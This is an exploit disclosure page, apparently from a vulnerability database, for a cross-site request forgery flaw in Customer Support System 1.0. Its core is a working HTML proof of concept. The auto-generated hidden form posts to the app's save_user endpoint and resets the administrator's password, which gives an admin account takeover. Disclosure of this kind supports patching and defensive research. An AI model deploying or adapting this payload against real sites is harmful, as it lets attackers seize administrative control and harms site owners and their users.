Customer Support System 1.0 Cross Site Request Forgery

2020.11.11
Credit: Ahmed Abbas
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Exploit Title: Customer Support System 1.0 - Cross-Site Request Forgery (Admin Account Takeover) # Date: 2020-11-11 # Exploit Author: Ahmed Abbas # Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 # Description : Admin Account Takeover # Vulnerability Details [+] The username and password parameters can be forged to force the password change of admin user account. # POC - CSRF HTML <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/customer_support/ajax.php?action=save_user" method="POST"> <input type="hidden" name="id" value="1" /> <input type="hidden" name="table" value="users" /> <input type="hidden" name="firstname" value="Administrator" /> <input type="hidden" name="middlename" value="" /> <input type="hidden" name="lastname" value="" /> <input type="hidden" name="username" value="admin" /> <input type="hidden" name="password" value="newpass" /> <input type="submit" value="Submit request" /> </form> </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top